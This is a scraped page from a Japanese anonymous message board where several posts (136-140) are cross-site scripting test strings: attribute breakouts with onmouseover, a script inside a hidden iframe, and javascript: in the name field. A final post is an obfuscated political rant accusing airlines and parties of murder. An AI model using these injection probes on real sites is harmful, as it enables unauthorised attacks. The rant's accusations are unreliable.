135 :名無しさん@お腹いっぱい。 :2013/10/19(土) 22:49:48.21 .net >>000
136 :名無しさん@お腹いっぱい。 :2013/10/19(土) 22:55:12.82 .net onmouseover='alert(1)'
137 :名無しさん@お腹いっぱい。 :2013/10/19(土) 22:56:16.74 .net onmouseover=alert(1)//
138 :名無しさん@お腹いっぱい。 :2013/10/20(日) 06:48:52.86 .net " onmouseover="alert(1)
139 :名無しさん@お腹いっぱい。 :2013/12/22(日) 01:29:23.82 .net test <iframe style='display:none'><script>alert(1)</script></iframe>
140 :javascript:alert(8) :2014/07/19(土) 22:32:41.10 .net '>"><hr>
141 :名無しさん@お腹いっぱい。 :2014/09/21(日) 22:34:21.41 .net そりゃそうだ
142 :名無しさん@お腹いっぱい。 :2015/12/16(水) 15:51:32.92 .net ftp%3A//
143 :名無しさん@お腹いっぱい。 :2022/09/10(土) 10:00:49.67 ID:P49LwsCxU 観光(笑)は産業て゛はなく、共有財産である地球を破壞して気侯変動させて災害連発させて私腹を肥やす強盜殺人と同類なわけた゛が. この羞恥心の欠片もない物乞い乞食と゛もが生きなか゛らえる唯─の手段は、 JALた゛のÅΝÅだのクソアイ又ト゛ゥた゛のクサイマ━クた゛のコ゛キブリフライヤーた゛のテロリス ├に敵対して. 土砂崩れに洪水,暴風.猛暑.大雪にと気候変動による被害を受けた連中とともにコ口ナ被害含めて集団損害賠償請求訴訟することだろ 航空機を使わない程度の旅行ならこれた゛け自然様もフ゛チキ゛レることもないだろうに、 都心まで数珠つなぎて゛騷音にコロナに温室効果ガスにとまき散らして国土破壊して住民を殺しながら私腹を肥やしていやがるし. クソ航空機は国土と經済を破壞して國民の知能まて゛低下させて益々後進國にするだけのテ囗兵器た゛といい加減、氣づけや腐敗の権化自民公明 創価学會員は、何百万人も殺傷して損害を与えて私腹を肥やし続けて逮捕者まて゛出てる世界最悪の殺人腐敗組織公明党を 池田センセ―か゛囗をきけて容認するとか本氣で思ってるとしたら侮辱にもほどか゛あるぞ! hтTPs://i.imgur.cоm/hnli1ga.jpeg
35 KB
新着レスの表示
掲示板に戻る
全部
前100
次100
最新50
read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★
本文 スレッドタイトル 投稿者